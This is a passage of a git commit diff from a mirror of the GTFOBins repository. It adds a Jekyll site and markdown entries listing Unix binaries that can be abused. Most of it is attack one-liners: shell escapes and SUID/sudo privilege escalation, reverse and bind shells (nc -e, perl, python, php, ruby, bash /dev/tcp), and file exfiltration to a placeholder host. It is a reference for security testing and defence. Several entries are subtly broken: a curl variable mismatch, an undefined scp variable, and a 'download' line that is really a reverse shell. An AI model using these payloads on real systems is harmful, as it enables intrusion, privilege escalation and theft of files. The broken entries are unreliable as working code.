mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-01-23 20:03:16 +01:00
First commit
This commit is contained in:
commit
b81e57005a
3
.gitignore
vendored
Normal file
3
.gitignore
vendored
Normal file
@ -0,0 +1,3 @@
|
||||
/_tmp/
|
||||
/.sass-cache/
|
||||
/_site/
|
3
CONTRIBUTING.md
Normal file
3
CONTRIBUTING.md
Normal file
@ -0,0 +1,3 @@
|
||||
# Contributing
|
||||
|
||||
TODO link to website URL
|
63
Gemfile.lock
Normal file
63
Gemfile.lock
Normal file
@ -0,0 +1,63 @@
|
||||
GEM
|
||||
remote: https://rubygems.org/
|
||||
specs:
|
||||
addressable (2.5.2)
|
||||
public_suffix (>= 2.0.2, < 4.0)
|
||||
colorator (1.1.0)
|
||||
concurrent-ruby (1.0.5)
|
||||
em-websocket (0.5.1)
|
||||
eventmachine (>= 0.12.9)
|
||||
http_parser.rb (~> 0.6.0)
|
||||
eventmachine (1.2.7)
|
||||
ffi (1.9.23)
|
||||
forwardable-extended (2.6.0)
|
||||
http_parser.rb (0.6.0)
|
||||
i18n (0.9.5)
|
||||
concurrent-ruby (~> 1.0)
|
||||
jekyll (3.8.1)
|
||||
addressable (~> 2.4)
|
||||
colorator (~> 1.0)
|
||||
em-websocket (~> 0.5)
|
||||
i18n (~> 0.7)
|
||||
jekyll-sass-converter (~> 1.0)
|
||||
jekyll-watch (~> 2.0)
|
||||
kramdown (~> 1.14)
|
||||
liquid (~> 4.0)
|
||||
mercenary (~> 0.3.3)
|
||||
pathutil (~> 0.9)
|
||||
rouge (>= 1.7, < 4)
|
||||
safe_yaml (~> 1.0)
|
||||
jekyll-sass-converter (1.5.2)
|
||||
sass (~> 3.4)
|
||||
jekyll-watch (2.0.0)
|
||||
listen (~> 3.0)
|
||||
kramdown (1.16.2)
|
||||
liquid (4.0.0)
|
||||
listen (3.1.5)
|
||||
rb-fsevent (~> 0.9, >= 0.9.4)
|
||||
rb-inotify (~> 0.9, >= 0.9.7)
|
||||
ruby_dep (~> 1.2)
|
||||
mercenary (0.3.6)
|
||||
pathutil (0.16.1)
|
||||
forwardable-extended (~> 2.6)
|
||||
public_suffix (3.0.2)
|
||||
rb-fsevent (0.10.3)
|
||||
rb-inotify (0.9.10)
|
||||
ffi (>= 0.5.0, < 2)
|
||||
rouge (3.1.1)
|
||||
ruby_dep (1.5.0)
|
||||
safe_yaml (1.0.4)
|
||||
sass (3.5.6)
|
||||
sass-listen (~> 4.0.0)
|
||||
sass-listen (4.0.0)
|
||||
rb-fsevent (~> 0.9, >= 0.9.4)
|
||||
rb-inotify (~> 0.9, >= 0.9.7)
|
||||
|
||||
PLATFORMS
|
||||
ruby
|
||||
|
||||
DEPENDENCIES
|
||||
jekyll
|
||||
|
||||
BUNDLED WITH
|
||||
1.16.1
|
10
Makefile
Normal file
10
Makefile
Normal file
@ -0,0 +1,10 @@
|
||||
.PHONY: serve bundle
|
||||
|
||||
serve:
|
||||
bundle exec jekyll serve
|
||||
|
||||
serve-public:
|
||||
bundle exec jekyll serve --host 0.0.0.0
|
||||
|
||||
bundle:
|
||||
bundle install
|
15
_config.yml
Normal file
15
_config.yml
Normal file
@ -0,0 +1,15 @@
|
||||
title: GTFOBins
|
||||
|
||||
exclude: ['/Gemfile', '/Makefile', '/README.md', '/CONTRIBUTING.md']
|
||||
|
||||
permalink: pretty
|
||||
|
||||
collections:
|
||||
gtfobins:
|
||||
output: true
|
||||
|
||||
defaults:
|
||||
- scope:
|
||||
path: '_gtfobins'
|
||||
values:
|
||||
layout: bin
|
39
_data/functions.yml
Normal file
39
_data/functions.yml
Normal file
@ -0,0 +1,39 @@
|
||||
exec-interactive:
|
||||
label: Interactive
|
||||
description: It executes interactive commands that may be exploited to break out from restricted shells.
|
||||
|
||||
exec-non-interactive:
|
||||
label: Non-interactive
|
||||
description: It executes non-interactive commands that may be exploited to break out from restricted shells.
|
||||
|
||||
suid-enabled:
|
||||
label: SUID
|
||||
description: It runs with the SUID bit set and may be exploited to escalate or maintain the privileges working as a SUID backdoor.
|
||||
|
||||
suid-limited:
|
||||
label: Limited SUID
|
||||
description: It runs with the SUID bit set and may be exploited to escalate or maintain the privileges working as a SUID backdoor. Its functioning depends on the default operating systems system shell and tipically works only on Debian Linux.
|
||||
|
||||
sudo-enabled:
|
||||
label: Sudo
|
||||
description: It runs in privileged contexts and may be used to escalate or maintain privileges if enabled on `sudo`.
|
||||
|
||||
download:
|
||||
label: Download
|
||||
description: It can download remote files.
|
||||
|
||||
upload:
|
||||
label: Upload
|
||||
description: It can exfiltrate files on the network.
|
||||
|
||||
bind-shell:
|
||||
label: Bind shell
|
||||
description: It can bind a shell to a local port to allow remote network access.
|
||||
|
||||
reverse-shell:
|
||||
label: Reverse shell
|
||||
description: It can send back a reverse shell to a listening attacker to open a remote network access.
|
||||
|
||||
load-library:
|
||||
label: Library load
|
||||
description: It loads shared libraries that may be used to run code in the binary execution context.
|
9
_gtfobins/awk.md
Normal file
9
_gtfobins/awk.md
Normal file
@ -0,0 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: awk 'BEGIN {system("/bin/sh")}'
|
||||
sudo-enabled:
|
||||
- code: sudo awk 'BEGIN {system("/bin/sh -p")}'
|
||||
suid-limited:
|
||||
- code: ./awk 'BEGIN {system("/bin/sh -p")}'
|
||||
---
|
40
_gtfobins/bash.md
Normal file
40
_gtfobins/bash.md
Normal file
@ -0,0 +1,40 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: bash
|
||||
sudo-enabled:
|
||||
- code: sudo bash
|
||||
suid-enabled:
|
||||
- code: ./bash -p
|
||||
upload:
|
||||
- description: Send local file in the body of an HTTP POST request.
|
||||
code: |
|
||||
RHOST=10.0.0.1
|
||||
RPORT=8000
|
||||
LFILE=file_to_send
|
||||
echo -e "POST / HTTP/0.9\n\n$(cat $LFILE)" > /dev/tcp/$RHOST/$RPORT
|
||||
- description: Send local file using a TCP connection.
|
||||
code: |
|
||||
RHOST=10.0.0.1
|
||||
RPORT=8000
|
||||
LFILE=file_to_send
|
||||
cat $LFILE > /dev/tcp/$RHOST/$RPORT
|
||||
download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
RHOST=10.0.0.1
|
||||
RPORT=8000
|
||||
LFILE=file_to_get
|
||||
(echo -e "GET /$LFILE HTTP/0.9\r\n\r\n" 1>&3 & cat 0<&3) 3<>/dev/tcp/$RHOST/$RPORT | (read i; while [ "$(echo $i | tr -d '\r')" != "" ]; do read i; done; cat) > $LFILE
|
||||
- description: Fetch remote file using a TCP connection.
|
||||
code: |-
|
||||
RHOST=10.0.0.1
|
||||
RPORT=8000
|
||||
LFILE=file_to_get
|
||||
bash -i >& /dev/tcp/$RHOST/$RPORT 0>&1 > $LFILE
|
||||
reverse-shell:
|
||||
- code: |
|
||||
RHOST=127.0.0.1
|
||||
RPORT=8000
|
||||
exec 5<&-;exec 5<>/dev/tcp/$RHOST/$RPORT;while read line 0<&5; do $line 2>&5 >&5; done
|
||||
---
|
9
_gtfobins/csh.md
Normal file
9
_gtfobins/csh.md
Normal file
@ -0,0 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: csh
|
||||
sudo-enabled:
|
||||
- code: sudo csh
|
||||
suid-enabled:
|
||||
- code: ./csh -b
|
||||
---
|
15
_gtfobins/curl.md
Normal file
15
_gtfobins/curl.md
Normal file
@ -0,0 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
upload:
|
||||
- description: Send local file with an HTTP POST request.
|
||||
code: |
|
||||
URL=http://10.0.0.1/
|
||||
LFILE=file_to_send
|
||||
curl -X POST -d @$file_to_send $URL
|
||||
download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |-
|
||||
export URL=http://10.0.0.1/file_to_get
|
||||
export LFILE=file_to_get
|
||||
curl $URL -o $LFILE
|
||||
---
|
15
_gtfobins/ed.md
Normal file
15
_gtfobins/ed.md
Normal file
@ -0,0 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: |
|
||||
ed
|
||||
!/bin/sh
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo ed
|
||||
!/bin/sh
|
||||
suid-limited:
|
||||
- code: |-
|
||||
./ed
|
||||
!/bin/sh -p
|
||||
---
|
9
_gtfobins/emacs.md
Normal file
9
_gtfobins/emacs.md
Normal file
@ -0,0 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: emacs -Q -nw --eval '(term "/bin/sh")'
|
||||
sudo-enabled:
|
||||
- code: sudo emacs -Q -nw --eval '(term "/bin/sh")'
|
||||
suid-enabled:
|
||||
- code: ./emacs -Q -nw --eval '(term "/bin/sh -p")'
|
||||
---
|
9
_gtfobins/env.md
Normal file
9
_gtfobins/env.md
Normal file
@ -0,0 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: env /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo env /bin/sh
|
||||
suid-enabled:
|
||||
- code: ./env /bin/sh -p
|
||||
---
|
9
_gtfobins/expect.md
Normal file
9
_gtfobins/expect.md
Normal file
@ -0,0 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: expect -c 'spawn /bin/sh;interact'
|
||||
sudo-enabled:
|
||||
- code: sudo expect -c 'spawn /bin/sh;interact'
|
||||
suid-enabled:
|
||||
- code: ./expect -c 'spawn /bin/sh -p;interact'
|
||||
---
|
9
_gtfobins/find.md
Normal file
9
_gtfobins/find.md
Normal file
@ -0,0 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: find . -exec /bin/sh \; -quit
|
||||
sudo-enabled:
|
||||
- code: sudo find . -exec /bin/sh \; -quit
|
||||
suid-enabled:
|
||||
- code: ./find . -exec /bin/sh -p \; -quit
|
||||
---
|
23
_gtfobins/ftp.md
Normal file
23
_gtfobins/ftp.md
Normal file
@ -0,0 +1,23 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: |
|
||||
ftp
|
||||
!/bin/sh
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo ftp
|
||||
!/bin/sh
|
||||
upload:
|
||||
- description: Send local file to a FTP server.
|
||||
code: |
|
||||
RHOST=10.0.0.1
|
||||
ftp $RHOST
|
||||
put file_to_send
|
||||
download:
|
||||
- description: Fetch a remote file from a FTP server.
|
||||
code: |
|
||||
RHOST=10.0.0.1
|
||||
ftp $RHOST
|
||||
get file_to_get
|
||||
---
|
7
_gtfobins/gdb.md
Normal file
7
_gtfobins/gdb.md
Normal file
@ -0,0 +1,7 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: gdb -nx -ex '!sh' -ex quit
|
||||
sudo-enabled:
|
||||
- code: sudo gdb -nx -ex '!sh' -ex quit
|
||||
---
|
9
_gtfobins/ionice.md
Normal file
9
_gtfobins/ionice.md
Normal file
@ -0,0 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: ionice /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo ionice /bin/sh
|
||||
suid-enabled:
|
||||
- code: ./ionice /bin/sh -p
|
||||
---
|
10
_gtfobins/ld.so.md
Normal file
10
_gtfobins/ld.so.md
Normal file
@ -0,0 +1,10 @@
|
||||
---
|
||||
description: Ld.so is the Linux dynamic linker/loader. Its file name and location might change between Linux versions.
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: /lib/ld.so /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo /lib/ld.so /bin/sh
|
||||
suid-enabled:
|
||||
- code: ./ld.so /bin/sh -p
|
||||
---
|
18
_gtfobins/less.md
Normal file
18
_gtfobins/less.md
Normal file
@ -0,0 +1,18 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: |
|
||||
less /etc/profile
|
||||
!/bin/sh
|
||||
- code: |
|
||||
VISUAL="/bin/sh -c '/bin/sh'" less /etc/profile
|
||||
v
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo less /etc/profile
|
||||
!/bin/sh
|
||||
suid-limited:
|
||||
- code: |-
|
||||
./less /etc/profile
|
||||
!/bin/sh -p
|
||||
---
|
15
_gtfobins/man.md
Normal file
15
_gtfobins/man.md
Normal file
@ -0,0 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: |
|
||||
man man
|
||||
!/bin/sh
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo man man
|
||||
!/bin/sh
|
||||
suid-limited:
|
||||
- code: |-
|
||||
./man man
|
||||
!/bin/sh -p
|
||||
---
|
15
_gtfobins/more.md
Normal file
15
_gtfobins/more.md
Normal file
@ -0,0 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: |
|
||||
TERM= more /etc/profile
|
||||
!/bin/sh
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
TERM= sudo -E more /etc/profile
|
||||
!/bin/sh
|
||||
suid-limited:
|
||||
- code: |-
|
||||
TERM= ./more /etc/profile
|
||||
!/bin/sh -p
|
||||
---
|
25
_gtfobins/nc.md
Normal file
25
_gtfobins/nc.md
Normal file
@ -0,0 +1,25 @@
|
||||
---
|
||||
functions:
|
||||
upload:
|
||||
- description: Serve a file on a TCP port.
|
||||
code: |
|
||||
RHOST=10.0.0.1
|
||||
RPORT=8000
|
||||
LFILE=file_to_send
|
||||
nc $RHOST $RPORT < "$LFILE"
|
||||
download:
|
||||
- description: Fetch remote file from a remote TCP port.
|
||||
code: |-
|
||||
LPORT=8000
|
||||
LFILE=file_to_get
|
||||
nc -l -p $LPORT > "$LFILE"
|
||||
reverse-shell:
|
||||
- code: |
|
||||
RHOST=10.0.0.1
|
||||
RPORT=8000
|
||||
nc -e /bin/sh $RHOST $RPORT
|
||||
bind-shell:
|
||||
- code: |
|
||||
LPORT=8000
|
||||
nc -lp $LPORT -e /bin/sh
|
||||
---
|
14
_gtfobins/perl.md
Normal file
14
_gtfobins/perl.md
Normal file
@ -0,0 +1,14 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: perl -e 'exec "/bin/sh";'
|
||||
sudo-enabled:
|
||||
- code: sudo perl -e 'exec "/bin/sh";'
|
||||
suid-enabled:
|
||||
- code: ./perl -e 'exec "/bin/sh";'
|
||||
reverse-shell:
|
||||
- code: |
|
||||
export RHOST=127.0.0.1
|
||||
export RPORT=12346
|
||||
perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
|
||||
---
|
39
_gtfobins/php.md
Normal file
39
_gtfobins/php.md
Normal file
@ -0,0 +1,39 @@
|
||||
---
|
||||
functions:
|
||||
exec-non-interactive:
|
||||
- code: |
|
||||
export CMD="ls /"
|
||||
php -r 'system($_ENV["CMD"]);'
|
||||
- code: |
|
||||
export CMD="ls /"
|
||||
php -r 'passthru($_ENV["CMD"]);'
|
||||
- code: |
|
||||
export CMD="ls /"
|
||||
php -r 'print(shell_exec($_ENV["CMD"]));'
|
||||
- code: |
|
||||
export CMD="ls /"
|
||||
php -r '$r=array(); exec($_ENV["CMD"], $r); print(join(\"\\n\",$r));'
|
||||
- code: |
|
||||
export CMD="ls /"
|
||||
php -r '$h=@popen($_ENV["CMD"],"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'
|
||||
- code: |
|
||||
export CMD="ls /"
|
||||
php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open($_ENV["CMD"], $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'
|
||||
upload:
|
||||
- description: Serve files in the local folder running an HTTP server.
|
||||
code: |
|
||||
LHOST=0.0.0.0
|
||||
LPORT=8888
|
||||
php -S $LHOST:$LPORT
|
||||
download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |-
|
||||
export URL=http://10.0.0.1/file_to_get
|
||||
export LFILE=file_to_get
|
||||
php -r '$c=file_get_contents($_ENV["URL"]);file_put_contents($_ENV["LFILE"], $c);'
|
||||
reverse-shell:
|
||||
- code: |
|
||||
export RHOST=127.0.0.1
|
||||
export RPORT=8000
|
||||
php -r '$sock=fsockopen($_ENV["RHOST"],$_ENV["RPORT"]);exec("/bin/sh -i <&3 >&3 2>&3");'
|
||||
---
|
32
_gtfobins/python2.md
Normal file
32
_gtfobins/python2.md
Normal file
@ -0,0 +1,32 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: python -c 'import os; os.system("/bin/sh")'
|
||||
sudo-enabled:
|
||||
- code: sudo python -c 'import os; os.system("/bin/sh")'
|
||||
suid-enabled:
|
||||
- code: ./python -c 'import os; os.system("/bin/sh -p")'
|
||||
upload:
|
||||
- description: Send local file via "d" parameter of a HTTP POST request.
|
||||
code: |
|
||||
export URL=http://10.0.0.1/
|
||||
export LFILE=file_to_send
|
||||
python -c 'import urllib as u,urllib2 as u2,os.environ as e; u2.urlopen(u2.Request(e["URL"],u.urlencode({"d":open(e["LFILE"]).read()})))'
|
||||
- description: Serve files in the local folder running an HTTP server.
|
||||
code: |
|
||||
export LPORT=8888
|
||||
python -m SimpleHTTPServer $LPORT
|
||||
download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |-
|
||||
export URL=http://10.0.0.1/file_to_get
|
||||
export LFILE=file_to_get
|
||||
python -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])'
|
||||
reverse-shell:
|
||||
- code: |
|
||||
export RHOST=127.0.0.1
|
||||
export RPORT=8000
|
||||
python -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
|
||||
load-library:
|
||||
- code: python -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
|
||||
---
|
32
_gtfobins/python3.md
Normal file
32
_gtfobins/python3.md
Normal file
@ -0,0 +1,32 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: python3 -c 'import os; os.system("/bin/sh")'
|
||||
sudo-enabled:
|
||||
- code: sudo python3 -c 'import os; os.system("/bin/sh")'
|
||||
suid-enabled:
|
||||
- code: ./python3 -c 'import os; os.system("/bin/sh -p")'
|
||||
upload:
|
||||
- description: Send local file via "d" parameter of a HTTP POST request.
|
||||
code: |
|
||||
export URL=http://10.0.0.1/
|
||||
export LFILE=file_to_send
|
||||
python3 -c 'import urllib.request as r,urllib.parse as u;from os import environ as e; r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))'
|
||||
- description: Serve files in the local folder running an HTTP server.
|
||||
code: |
|
||||
LPORT=8888
|
||||
python3 -m http.server $LPORT
|
||||
download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |
|
||||
export URL=http://10.0.0.1/file_to_get
|
||||
export LFILE=file_to_get
|
||||
python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])'
|
||||
reverse-shell:
|
||||
- code: |
|
||||
export RHOST=127.0.0.1
|
||||
export RPORT=8000
|
||||
python3 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")'
|
||||
load-library:
|
||||
- code: python3 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
|
||||
---
|
9
_gtfobins/rpm.md
Normal file
9
_gtfobins/rpm.md
Normal file
@ -0,0 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: rpm --eval '%{lua:posix.exec("/bin/sh")}'
|
||||
sudo-enabled:
|
||||
- code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}'
|
||||
suid-enabled:
|
||||
- code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}'
|
||||
---
|
9
_gtfobins/rpmquery.md
Normal file
9
_gtfobins/rpmquery.md
Normal file
@ -0,0 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
|
||||
sudo-enabled:
|
||||
- code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
|
||||
suid-enabled:
|
||||
- code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}'
|
||||
---
|
19
_gtfobins/ruby.md
Normal file
19
_gtfobins/ruby.md
Normal file
@ -0,0 +1,19 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: ruby -e 'exec "/bin/sh"'
|
||||
sudo-enabled:
|
||||
- code: sudo ruby -e 'exec "/bin/sh"'
|
||||
reverse-shell:
|
||||
- code: |
|
||||
export RHOST=10.0.0.1
|
||||
export RPORT=8000
|
||||
ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
|
||||
load-library:
|
||||
- code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
|
||||
upload:
|
||||
- description: Serve files in the local folder running an HTTP server.
|
||||
code: |
|
||||
export LPORT=8888
|
||||
ruby -run -e httpd . -p $LPORT
|
||||
---
|
36
_gtfobins/scp.md
Normal file
36
_gtfobins/scp.md
Normal file
@ -0,0 +1,36 @@
|
||||
---
|
||||
functions:
|
||||
exec-non-interactive:
|
||||
- code: |
|
||||
TF=$(mktemp)
|
||||
CMD="touch /tmp/unrestricted"
|
||||
echo "$CMD" > "$TF"
|
||||
chmod +x "$TF"
|
||||
scp -S $TF x y:
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
TF=$(mktemp)
|
||||
CMD="touch /tmp/unrestricted"
|
||||
echo "$CMD" > "$TF"
|
||||
chmod +x "$TF"
|
||||
sudo scp -S $TF x y:
|
||||
suid-limited:
|
||||
- code: |
|
||||
TF=$(mktemp)
|
||||
CMD="touch /tmp/unrestricted"
|
||||
echo "$CMD" > "$TF"
|
||||
chmod +x "$TF"
|
||||
./scp -S $TF a b:
|
||||
upload:
|
||||
- description: Send local file to a SSH server.
|
||||
code: |
|
||||
RPATH=user@10.0.0.1:~/where_to_save
|
||||
LPATH=file_to_send
|
||||
scp $LFILE $RPATH
|
||||
download:
|
||||
- description: Fetch a remote file from a SSH server.
|
||||
code: |
|
||||
RPATH=user@10.0.0.1:~/file_to_get
|
||||
LFILE=where_to_save
|
||||
scp $RPATH $LFILE
|
||||
---
|
9
_gtfobins/setarch.md
Normal file
9
_gtfobins/setarch.md
Normal file
@ -0,0 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: setarch $(arch) /bin/sh
|
||||
sudo-enabled:
|
||||
- code: setarch $(arch) /bin/sh
|
||||
suid-enabled:
|
||||
- code: ./setarch $(arch) /bin/sh -p
|
||||
---
|
20
_gtfobins/ssh.md
Normal file
20
_gtfobins/ssh.md
Normal file
@ -0,0 +1,20 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- description: Reconnecting may help bypassing restricted shells.
|
||||
code: ssh localhost /bin/bash --noprofile --norc
|
||||
download:
|
||||
- description: Fetch a remote file from a SSH server.
|
||||
code: |
|
||||
HOST=user@10.0.0.1
|
||||
RPATH=file_to_get
|
||||
LPATH=where_to_save
|
||||
ssh $HOST "cat $RPATH" > $LPATH
|
||||
upload:
|
||||
- description: Send local file to a SSH server.
|
||||
code: |
|
||||
HOST=user@10.0.0.1
|
||||
RPATH=where_to_save
|
||||
LPATH=file_to_send
|
||||
ssh $HOST "cat > $RPATH" < $LPATH
|
||||
---
|
9
_gtfobins/strace.md
Normal file
9
_gtfobins/strace.md
Normal file
@ -0,0 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: strace -o /dev/null /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo strace -o /dev/null /bin/sh
|
||||
suid-enabled:
|
||||
- code: ./strace -o /dev/null /bin/sh -p
|
||||
---
|
10
_gtfobins/tar.md
Normal file
10
_gtfobins/tar.md
Normal file
@ -0,0 +1,10 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
||||
suid-limited:
|
||||
- code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec="/bin/sh
|
||||
-p"
|
||||
---
|
9
_gtfobins/taskset.md
Normal file
9
_gtfobins/taskset.md
Normal file
@ -0,0 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: taskset 1 /bin/sh
|
||||
sudo-enabled:
|
||||
- code: sudo taskset 1 /bin/sh
|
||||
suid-enabled:
|
||||
- code: ./taskset 1 /bin/sh -p
|
||||
---
|
15
_gtfobins/tclsh.md
Normal file
15
_gtfobins/tclsh.md
Normal file
@ -0,0 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: |
|
||||
tclsh
|
||||
exec /bin/sh <@stdin >@stdout 2>@stderr
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo tclsh
|
||||
exec /bin/sh <@stdin >@stdout 2>@stderr
|
||||
suid-enabled:
|
||||
- code: |
|
||||
./tclsh
|
||||
exec /bin/sh -p <@stdin >@stdout 2>@stderr
|
||||
---
|
34
_gtfobins/telnet.md
Normal file
34
_gtfobins/telnet.md
Normal file
@ -0,0 +1,34 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: |
|
||||
RHOST=www.google.com
|
||||
RPORT=80
|
||||
telnet $RHOST $RPORT
|
||||
^]
|
||||
!/bin/sh
|
||||
description: MacOS only.
|
||||
reverse-shell:
|
||||
- code: |
|
||||
RHOST=127.0.0.1
|
||||
RPORT=8000
|
||||
TF=$(mktemp)
|
||||
rm $TF
|
||||
mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/bash 1>$TF
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
RHOST=www.google.com
|
||||
RPORT=80
|
||||
sudo telnet $RHOST $RPORT
|
||||
^]
|
||||
!/bin/sh
|
||||
description: MacOS only.
|
||||
suid-limited:
|
||||
- code: |
|
||||
RHOST=www.google.com
|
||||
RPORT=80
|
||||
./telnet $RHOST $RPORT
|
||||
^]
|
||||
!/bin/sh
|
||||
description: MacOS only.
|
||||
---
|
15
_gtfobins/tftp.md
Normal file
15
_gtfobins/tftp.md
Normal file
@ -0,0 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
upload:
|
||||
- description: Send local file to a TFTP server.
|
||||
code: |
|
||||
RHOST=10.0.0.1
|
||||
tftp $RHOST
|
||||
put file_to_send
|
||||
download:
|
||||
- description: Fetch a remote file from a TFTP server.
|
||||
code: |
|
||||
RHOST=10.0.0.1
|
||||
tftp $RHOST
|
||||
get file_to_get
|
||||
---
|
13
_gtfobins/vi.md
Normal file
13
_gtfobins/vi.md
Normal file
@ -0,0 +1,13 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: vi -c ':!/bin/sh'
|
||||
- code: |
|
||||
vi
|
||||
:set shell=/bin/sh
|
||||
:shell
|
||||
sudo-enabled:
|
||||
- code: sudo vi -c ':!/bin/sh'
|
||||
suid-enabled:
|
||||
- code: ./vi -c ':!/bin/sh -p'
|
||||
---
|
15
_gtfobins/wget.md
Normal file
15
_gtfobins/wget.md
Normal file
@ -0,0 +1,15 @@
|
||||
---
|
||||
functions:
|
||||
upload:
|
||||
- description: Send base64-encoded local file via "d" parameter of a HTTP POST request.
|
||||
code: |
|
||||
export URL=http://10.0.0.1/
|
||||
export LFILE=file_to_send
|
||||
wget --post-data="d=$(base64 $LFILE | tr -d '\n')" $URL
|
||||
download:
|
||||
- description: Fetch a remote file via HTTP GET request.
|
||||
code: |-
|
||||
export URL=http://10.0.0.1/file_to_get
|
||||
export LFILE=file_to_get
|
||||
wget $URL -O $LFILE
|
||||
---
|
11
_gtfobins/wish.md
Normal file
11
_gtfobins/wish.md
Normal file
@ -0,0 +1,11 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: |
|
||||
wish
|
||||
exec /bin/sh <@stdin >@stdout 2>@stderr
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
sudo wish
|
||||
exec /bin/sh <@stdin >@stdout 2>@stderr
|
||||
---
|
9
_gtfobins/zsh.md
Normal file
9
_gtfobins/zsh.md
Normal file
@ -0,0 +1,9 @@
|
||||
---
|
||||
functions:
|
||||
exec-interactive:
|
||||
- code: zsh
|
||||
sudo-enabled:
|
||||
- code: sudo zsh
|
||||
suid-enabled:
|
||||
- code: ./zsh
|
||||
---
|
57
_includes/bin_table.html
Normal file
57
_includes/bin_table.html
Normal file
@ -0,0 +1,57 @@
|
||||
